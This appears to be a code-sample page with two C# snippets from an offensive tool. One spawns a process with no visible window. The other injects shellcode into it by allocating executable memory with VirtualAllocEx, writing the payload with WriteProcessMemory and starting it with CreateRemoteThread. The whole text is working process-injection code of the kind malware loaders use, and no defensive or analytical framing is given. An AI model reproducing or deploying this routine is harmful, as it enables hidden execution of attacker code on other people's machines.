Пример #1
0
        public static IntPtr SpawnNewProcess(string processName)
        {
            STRUCTS.STARTUPINFO         si = new STRUCTS.STARTUPINFO();
            STRUCTS.PROCESS_INFORMATION pi = new STRUCTS.PROCESS_INFORMATION();
            bool success = IMPORTS.CreateProcessA(null, processName,
                                                  IntPtr.Zero, IntPtr.Zero, false,
                                                  STRUCTS.ProcessCreationFlags.CREATE_NO_WINDOW,
                                                  IntPtr.Zero, null, ref si, out pi);

            Console.WriteLine("Process {0} Created! \n PID: {1}", processName, pi.dwProcessId);
            return(pi.hProcess);
        }
Пример #2
0
        public static void Inject(IntPtr processHandle, byte[] shellcode)
        {
            IntPtr written = IntPtr.Zero;

            Console.WriteLine("Hit a key to alloc memory");
            Console.ReadKey();
            IntPtr memoryaddr = IMPORTS.VirtualAllocEx(processHandle, IntPtr.Zero, (uint)(shellcode.Length), STRUCTS.AllocationType.Commit | STRUCTS.AllocationType.Reserve, STRUCTS.MemoryProtection.ExecuteReadWrite);

            Console.WriteLine("Hit a key to write memory");
            Console.ReadKey();
            IMPORTS.WriteProcessMemory(processHandle, memoryaddr, shellcode, shellcode.Length, out written);
            Console.WriteLine("Hit a key to create the thread and launch our shellcode!");
            Console.ReadKey();
            IMPORTS.CreateRemoteThread(processHandle, IntPtr.Zero, 0, memoryaddr, IntPtr.Zero, 0, IntPtr.Zero);
        }